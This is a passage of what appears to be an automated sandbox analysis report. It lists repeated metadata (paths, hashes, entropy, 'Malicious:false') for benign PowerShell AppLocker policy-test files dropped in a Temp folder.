                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_actcpao1.kt3.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1mfdzss.bjv.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebgn3tjo.qtv.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmgjwo55.x4e.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mi1gil4y.nsl.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1o2y45g.mdg.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oevjvekl.wcu.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvv1m5ii.01a.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxpcr3rk.rzv.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svygozhu.2z0.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wy0a1vof.yoo.ps1

                                                                                                                                                Download File
                                                                                                                                                Process: